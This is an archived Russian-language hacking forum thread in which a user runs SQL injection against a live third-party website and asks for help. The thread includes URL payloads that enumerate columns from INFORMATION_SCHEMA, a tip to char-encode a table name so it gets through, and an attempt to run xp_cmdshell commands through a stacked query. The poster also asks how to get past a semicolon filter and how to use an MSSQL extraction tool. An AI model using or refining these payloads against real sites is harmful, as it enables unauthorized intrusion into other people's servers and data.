PDA

Просмотр полной версии : Mssql не могу понять


Grema
25.03.2008, 21:15
http://***.***.ru/?id=1%20or%201=(select%20TOP%201%20COLUMN_NAME%20F ROM%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_N AME='henna')--

ошибка: message: Invalid column name 'henna'. (severity 16)
че так плохо?

blackybr
25.03.2008, 21:38
заэнкодь henna в чар

Grema
26.03.2008, 00:50
заработала, спс.

вот теперь другое интересует
http://***.***.ru/?id=1;exec%20master..xp_cmdshell%20'dir%20c:\'--

Conversion failed when converting the varchar value '1exec master..xp_cmdshell dir c:' to data type int. (severity 16)

Incorrect syntax near 'xec'.

он ; вообще невидит, фильтрует походу, чето можно сделать?


еще интересно как пользоваться http://www.hack-shop.org.ru/tools-mssql-exractor
видел тут видео было, но ссылка здохла( обьясните плз!

Basurman
26.03.2008, 12:15
info.l2r.ru?
там ни одной таблицы с рег данными нет

Grema
26.03.2008, 19:18
та я попрактиковаться хочу с MSSQL, никогда не ломал! поэтому и интересуюсь.

а сайт ты правильно подметил) как нашёл? :)
+ если ; как то сделать то можно заюзать xp_cmdshell или еще что-то.
подскажите как

Jokester
26.03.2008, 22:51
Там, что база запущена под sa?
Сомневаюсь , а в остальных случаях 99% на эти команды у тебя прав не хватит